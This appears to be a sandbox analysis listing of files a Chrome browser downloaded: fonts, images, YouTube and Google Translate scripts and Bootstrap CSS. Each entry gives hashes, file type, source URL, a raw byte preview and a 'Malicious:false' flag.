                                                                                                                                                                                                                                                            SSDEEP:768:Pvv4stEFOPWmHdvGEzSWz8HK8BRT8v57+GNrPRMhmaSj4VrOzfWlgftJHGuZ/a:vy4PJ9e7Y8HFBh8v57T9UmaSj2aClgvi
                                                                                                                                                                                                                                                            MD5:29C0769F4443B654C42E38E66241B29A
                                                                                                                                                                                                                                                            SHA1:9626CF6013D971F6A4D37DBED7C249D06F77421C
                                                                                                                                                                                                                                                            SHA-256:21BCD83A19A091CF20A110734102A6997E9FF2DB5242DA831095C9177C4B4544
                                                                                                                                                                                                                                                            SHA-512:9E16F2F9B0340AC52E9C9932800998ADE7408F1E2814FFEA17AFE399CEE131478C75FB0444E55FF291377A8473B588C815A49176F868A45DDC1980C4384ABE37
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...............................................d..........................!1.."A...Qa2q...#BR...$&3Ubstu.........%45CETr.......Se.....6Dc....d.....................................G........................!1AQ..aq..."2........4BRr....#$CSb..3...5c..U............?........B.J8.X.Sg....9S5..RA.*.{..q...iF..9.......D.....O...W.D&.*L.by..h.0].L*...H..18...m..}y_B..fW53...}.V6.,.f....|p..S.:.q. .UgR..HF.l.....8...si^.igc}S.`.,.}...F.M.S......6.B..$RD.1a..aj..].%}.[.x.j.]...'...VX...G..U.9..$(.6L.(h'..G.&....6...+.....;X.?Y'&.....}......uq"..F.d..w..`.o..&]b.....$c...B9.knoO=..m...R.`...m9.O..>...M.wp....P..!. 1...h.!6.1.@2..Wt...K#.../..G.X.}....#q#.<...]..\.xF7..r.:.x!.....+.H.<....V../{sq5.wb....m..<.~...:.MB...NJ.".w.I.|Hy.....>..5....T.>(.u........F.r...y.....=....4.FQ..-.Gm.^B..q#...$1..$."...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 21700, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):21700
                                                                                                                                                                                                                                                            Entropy (8bit):7.989666631701204
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:PxbG/ZciREUTWlMwbptJm5f9/1HuLZ4r38bxSpfGL/+SHA+ilQlO3fq8O/4s:5bfiBWlRPm5fjrruYJGTiqlO3fo/p
                                                                                                                                                                                                                                                            MD5:7D75A9EB3B38B5DD04B8A7CE4F1B87CC
                                                                                                                                                                                                                                                            SHA1:68F598C84936C9720C5FFD6685294F5C94000DFF
                                                                                                                                                                                                                                                            SHA-256:6C24799E77B963B00401713A1DBD9CBA3A00249B9363E2C194D01B13B8CDB3D7
                                                                                                                                                                                                                                                            SHA-512:CF0488C34A1AF36B1BB854DEA2DECFC8394F47831B1670CAB3EED8291B61188484CC8AB0A726A524ECDD20B71D291BCCCBC2CE999FD91662ACA63D2D22ED0D9F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......T...........T_..........................4..*....`..~..d..u.....,..$.....6.$..|. ..V..K..^.=...sp.f.m../....l\.....T.9.n..A...........2x.{P[V..v%..M...f.7..+c.cM.'...$..u.H4[?i.'..T..+.(...L...inV.@.dd....T.. }b...c.ghRA..I$.su.....`....Q.OB..S.{.#.3..o.{v.........n...]f#b.J_.......}# ..1... F........=?O.|._p........X.6.VQ.*.E..rU...}....dK.$...0.W..2i..Y...9.Y.............f{..6'....C:%.(........}.....W..._....k...|.........Y8./..e..........L......_.9..v...2F..$..y)....UWu_..T.]qE.H.b..OP...B@.4.!,F..._............z.3.*.A,h.M.(...6~_[U$.....uM2.*..qz.v.........hV\|?.......M-.h..by.A,.}.....?...52.g.,....<..s..k....h.U.]1.1..O......m......j...}6.j.v.a..R....Fj...).fO3........GSM....... ...GL..({A....$O..&'..\....:.x....{N.p8..q..iF..k...b.>....<..M..`.....d.I.5... .x...mo.L.?A(..F }./.._V.e.A.Z3.....C...h...f......(,..3....%.h'.?sG..&x..W.......b].'34.S#s...wiG.O....J.ADDDDBw.m;.....K.ti).....?.6.\.M..d.....[.z....4..D.b...6..F.....F..D.r
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):78277
                                                                                                                                                                                                                                                            Entropy (8bit):7.956888332273651
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:BiNLq94LHApgTXFwLm7uAUmZKrgOn24boNK9tPQ5ON7PmcSX:Qg9ggpTLoUmJOqGtcO5Pl8
                                                                                                                                                                                                                                                            MD5:3074613CD645A493556E0537685BC681
                                                                                                                                                                                                                                                            SHA1:2166F2F3E325C74D1BB9D9481BC34DA0F9B7524C
                                                                                                                                                                                                                                                            SHA-256:54F4E58815DEA9D32D6060D1E3A7F3D12966FBE5F816F8DE7F444F85383A024B
                                                                                                                                                                                                                                                            SHA-512:AAB82B703B6EF106D2704158DA53D22ED6BBDB3013B23F6978D37630F13625F9FBF5E4151B7E0D37E22C6743E8C1420EBD32BC1F8B3F1F548207C8389E801BFA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:c9434a28-dbee-4a40-9335-948cf49a3268" xmpMM:DocumentID="xmp.did:27116169385611E9AD04A38A63232406" xmpMM:InstanceID="xmp.iid:27116168385611E9AD04A38A63232406" xmp:CreatorTool="Adobe Photoshop CC 2018 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3614d4f7-3152-44b3-9651-d525f5349542" stRef:documentID="adobe:docid:photoshop:5d35e9f1-165f-3a47-a030-4eedce31ea31"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (555)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2247419
                                                                                                                                                                                                                                                            Entropy (8bit):5.6541368890334605
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:BdKBuDMpD4qmMSWSctj1MfBDh9IS8ovqhg:uBuDMWqmMSWjj1MfB3N8ovqhg
                                                                                                                                                                                                                                                            MD5:28DF01CF2393EEE31B7A5ADBB0525606
                                                                                                                                                                                                                                                            SHA1:A722FDFC18E4C7E48156A6708FC9B145F6427795
                                                                                                                                                                                                                                                            SHA-256:5434EAEA46BA59097C38351199F477DC9898FFC033DF1188E5B2985FB1DDDB41
                                                                                                                                                                                                                                                            SHA-512:6655A11D2376A2AA8F239BF323B0CE3978783955C96B8688139F9B9293850C1B504EC075DED294228142A056EA58DAE9C70186E1FE7F1A2157AA6DF639136E82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/player_ias.vflset/en_US/base.js
                                                                                                                                                                                                                                                            Preview:var _yt_player={};(function(g){var window=this;/*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):34187
                                                                                                                                                                                                                                                            Entropy (8bit):7.955960097215149
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:KORIEujzTUZVsZprJ3ykPikYAFu370MyLpou7gEB9cr+1m:KBEu3TMXkakYAMr0MyLeuUwi
                                                                                                                                                                                                                                                            MD5:D5BDE41AE06EEB8A3AE652E01F2394D5
                                                                                                                                                                                                                                                            SHA1:255A07591653637B6369F7439CA22380A4597346
                                                                                                                                                                                                                                                            SHA-256:4F033FE4FF41FBB6A725891F0145B4F6273B96F2EA553A1636E30BC83462A37C
                                                                                                                                                                                                                                                            SHA-512:D5C276C90DEC46871C6002FBBFF6FEA7E9778E9CC71FACA7CD72FED7E78570D44C99238A92042F04E29042415A90E3734306E0BBAA1382E56AC7AADAA30EAECE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/l7tWDOsi7vv4CzF9xthvpZ14buBNB2c0gFrQXm2_OehYVnKqtdVTGg3mHM--_LCDXEhNHMoz336hier2hdWEx7AyW7lonhg7WSTRmfkonmDBtFXsiLs
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................K......................!..1.A."Qa.q.2.......#B.R...3br.....CSs..$c....D...................................5......................!.1.AQ.."a..2q..B...#Rbr...3$............?....@.(.e.l......6P.-....6P....@.(.e.l......6P...|1@&...@.(.e.l......6P....@.(.e.l......R..M....6P....@.(..(....e.l......V......6P....@.(.e.l......6P....@.(.e.l..h............@......@6.(..(..(..(..X...(............M.....hP..I...M.......$.d.N'.h..@...(.3....@.....1$v.P....6.V........q..*.v.j.Y...(..X......4.h...J...@8-....................................@6.".}.D....JM.-t[..e,..,l.c.<......|...4.I.q..>re.G.W.d...2..~j.(..x..+..d...Y^.?. ~.j.BE].bMI......V...T'B.5(...I.J.X.R..(..(..(..(.*P...h....h."...."8..........Yh..................h..(.4.M...@..@......MCiv[.}..:.?h...b./.m.]N.iy ...*.S...lj-.....B.,.C
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):13875
                                                                                                                                                                                                                                                            Entropy (8bit):7.969426298400998
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:7SIe85Ucea4DRpiy16E/zAHkTzuVcHhqH1MYLgRuTnUYLV2ccBUek6J9dCQ:KcN4D3t1/LeWjH8H1MYLglYLxH6vAQ
                                                                                                                                                                                                                                                            MD5:1643D10D9A13B483DA88CC4EC7A702C1
                                                                                                                                                                                                                                                            SHA1:4560E153232DBF7523BF108372F1CDB2B119A34A
                                                                                                                                                                                                                                                            SHA-256:4750B9809702F568D2691010615B76ACE84BEC560DB76542DCE37107A817394A
                                                                                                                                                                                                                                                            SHA-512:80781025D6A0C10B3CD39B928399C44F5606F1E1D9F093BB226F39BA5269DC8127C21D1811160F51BD796619E8D39AF7BE5A37CC0CF1C04C869AF4F8DCB3A480
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.moneycointv.com/wp-content/uploads/2021/09/favicon-150x150.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.............<.q.....pHYs..........+.... .IDATx..y.e.u..9w{.{.u....)."..`.2.%..+F.l.,.r..T...D ..0......8....&....$.@[.m.$.MQCrf8...z......'......}U.....V.........~.....;...1..1..1..1..1..1..1..1..1..1..1..1..1..1.a$y....5.-9.eT.A8'p.8.,...3..J.a...f.#...R..[@..(t..T.....Px..G.. ....v@:.KW.GY.O.}..V..p.x....)<'".E.C9...?..Q."..."p..m.MD..n.+.KW.J.'..h.j][B.gDx....~......"./3...52!A......./*.#\...\.^..s.JzB.2......'@?..=.^.=.......!.k.|.........[...-.>v.j^.|F.O .} .p1~..]....................Wz.Z.#....Z.N.?..".2PU$RF............{>..A@.....{.u..L....m...0ML..4-,..9.,N...z...W...KW&+...#3......O@~DT?.`..ne....A.....}....~.A..7..w]<w@........M.-.l...m...`.....B..S,b.6.ibH.t........U.+.K.=.Fv....aU./D......TTq......v.^.C.....q..T..u.....$...v.8.".r.R.B.\.)..,+..............W6...Q..V.....Q~....8.yyA..m.ioo.i..i...}.`.U....!`.`.!oD.+#..0d(...1.j.;P!. .....!d*./.,..2.z.J.N...)........+.....K..kw.......Z.,.?........i8H..@.u;477inl...!..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (770)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1275
                                                                                                                                                                                                                                                            Entropy (8bit):5.291996382684132
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:k6Pq70U8EeVzdqnCYw1uD/x/ZLyiFOCU9nhxzNzPw7edGuQkLGQ5i2r2OOu7Zxvz:U70UqsnCvITPFO9j/Y6IJyGz2rJ7ZZrP
                                                                                                                                                                                                                                                            MD5:A4C3A5C1202F21C17885E14C2F4E2782
                                                                                                                                                                                                                                                            SHA1:7994DC4E6BC684A5AE3F3D6CCD212A1648D3B437
                                                                                                                                                                                                                                                            SHA-256:1E1B0FFDD9CB7C61C4088D5F6DEE21DEA14085E309194B6576017C9776FAF2B2
                                                                                                                                                                                                                                                            SHA-512:B984E3752266934B06ECBB23C0FE8E918062E2BF04E4C7ED4E263966E7BFAFEA7942BE5616F0AA871E8BC73965C36A39370971B57BCAE1CFFE0C93F4721FC4FF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=bm51tf"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("bm51tf");.var Skb=function(a,b,c,d,e){this.o=a;this.ma=b;this.s=c;this.T=d;this.ua=e;this.i=0;this.j=Rkb(this)},Tkb=function(a){var b={};_.Pa(a.wB(),function(e){b[e]=!0});var c=a.jB(),d=a.qB();return new Skb(a.iz(),1E3*c.getSeconds(),a.cB(),1E3*d.getSeconds(),b)},Rkb=function(a){return Math.random()*Math.min(a.ma*Math.pow(a.s,a.i),a.T)},p2=function(a,b){return a.i>=a.o?!1:null!=b?!!a.ua[b]:!0};var q2=function(a){_.M.call(this,a.va);this.o=a.service.rD;this.s=a.service.metadata;a=a.service.Y_;this.j=a.o.bind(a)};_.C(q2,_.M);q2.Ba=_.M.Ba;q2.qa=function(){return{service:{rD:_.Pkb,metadata:_.k2,Y_:_.AH}}};q2.prototype.i=function(a,b){if(1!=this.s.getType(a.tc()))return _.Km(a);var c=this.o.i;(c=c?Tkb(c):null)&&p2(c)?(b=Ukb(this,a,b,c),a=new _.Hm(a,b,2)):a=_.Km(a);return a};.var Ukb=function(a,b,c,d){return c.then(function(e){return e},function(e){if(!e.status||!p2(d,
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 306, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):17075
                                                                                                                                                                                                                                                            Entropy (8bit):7.906020822136208
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:WOCCyGEZo5LFr8LiLfL/cZK/5a55o8v8Zd1oK7PZ0gACrIjp1Xl:iZo5LFr8LC/cZK/5a5WC8XWljpdl
                                                                                                                                                                                                                                                            MD5:9EDD62E09811D37B3F46E4121DC42A13
                                                                                                                                                                                                                                                            SHA1:83DD6D14E786B7F4C9FF343313DACF667043728B
                                                                                                                                                                                                                                                            SHA-256:5A99E53400B256C7C1391EADFBEB0FFD39FA9A46B171FC942B9D48EA10C3F898
                                                                                                                                                                                                                                                            SHA-512:B459612AC38209C893E4EF59F7F6172230DB6B7FF0A682EF868046425C155FA1460D6716FB7AD99DD19982F5EBE2B990D2F0A45A428D73B3BB04C4837F00E635
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/QEMbwo7Ti8RLlXgjwI3XmLofgQarTUsJhdlzW3qmjsweqEBVZQybyhODbfGRBJKkpnbEkzZUxCMBcqATjh5XFT6SsxA46apOCAbnRUWmitINMI_VT5w?=w1440=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......2......"h.....sBIT....|.d... .IDATx...w.\e....}..%...(..".H'.....(H...>..?P........b.I/J..E..HQ...&!......s...g'....L.=.....L...u.....|{.p.......f.].!"""R.18.I:..O.R.1.........M.;s.\g..T.EDD..cV.y".. .....X..|............4d.!......1....` .......L_.."..r.13.._Q.........r.N......~B"""R=..%...}.6k.@DDd..v.8C&..Z.....pqT.EDD.........S.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R.....!......R......H..@..q..T.].....`L./.1....P..|?..o-.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1150 x 460
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):134596
                                                                                                                                                                                                                                                            Entropy (8bit):7.95531836625007
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:vRA7atBj7dtUeWJf8rzGsscTbr0c5+CtwNqiRWzHbUjQUZO:Zbtt7dQJf8rzG48cxtwNqiITbUjNO
                                                                                                                                                                                                                                                            MD5:49145BE38E9CC5299543EA80ABC2EDCB
                                                                                                                                                                                                                                                            SHA1:755BD53AAEBEACB7A78E0CFD24694DCA207F4B68
                                                                                                                                                                                                                                                            SHA-256:4CB4280AD13A6C2DC801349266820FCBE3C27FDDA90D5D0A8ACB3F1FFE49338A
                                                                                                                                                                                                                                                            SHA-512:028E01224570191BEE47FD5B5416C621A4625A1C658856F271DB2983AD472F4A97824549B39A8B48B395B4815A75B6A3B10F1C1013AAB4255CBFDA9DC527CB48
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2018/tunisia-national-day-6461049875202048.4-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a~.........l..h....Z.................t......h.e.............e....o........q.......S....2Z..T..s.........K...............]....................................................................\.Aa...........).....js..............HT....y........%.......Qr....................&4...................3.......%.............b.............6D.................Yc...q...'............{...|........6....O.......l........................4]..F.........m.......|...Jq....e...................#@r....b.8\.....}.......k..i..e...Qm...m................}....................y..a.....m..............y..........................._a..........h.....................................................|.............C........@...m..............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65325)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):144877
                                                                                                                                                                                                                                                            Entropy (8bit):5.049937202697915
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                                                                                                                                                                                                                                                            MD5:450FC463B8B1A349DF717056FBB3E078
                                                                                                                                                                                                                                                            SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                                                                                                                                                                                                                            SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                                                                                                                                                                                                                            SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                                                                                                                                                                                                                            Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):52366
                                                                                                                                                                                                                                                            Entropy (8bit):7.972300129058378
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:56uQaPeWybG/qWHNOHWtqIhmWj+fhsPTQ:56uQ4ex838HWLmjhATQ
                                                                                                                                                                                                                                                            MD5:0A938CDA57C0151598101FF35FF06D36
                                                                                                                                                                                                                                                            SHA1:BDBF0726A4F1E01291997E7F12329D817945E780
                                                                                                                                                                                                                                                            SHA-256:2535848B5E55E10EED6ED92760A5A78F696567A3B80E6A60B8BAE919B9FBBE2B
                                                                                                                                                                                                                                                            SHA-512:6F67C0C4F6967B588F056C2091D113995253CC024190213EA1FBF49500305AE5E2F33E53E6FA3524130A4F4A6B4A4301C46E17C52FFE82B435A6D2E99FE1951B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
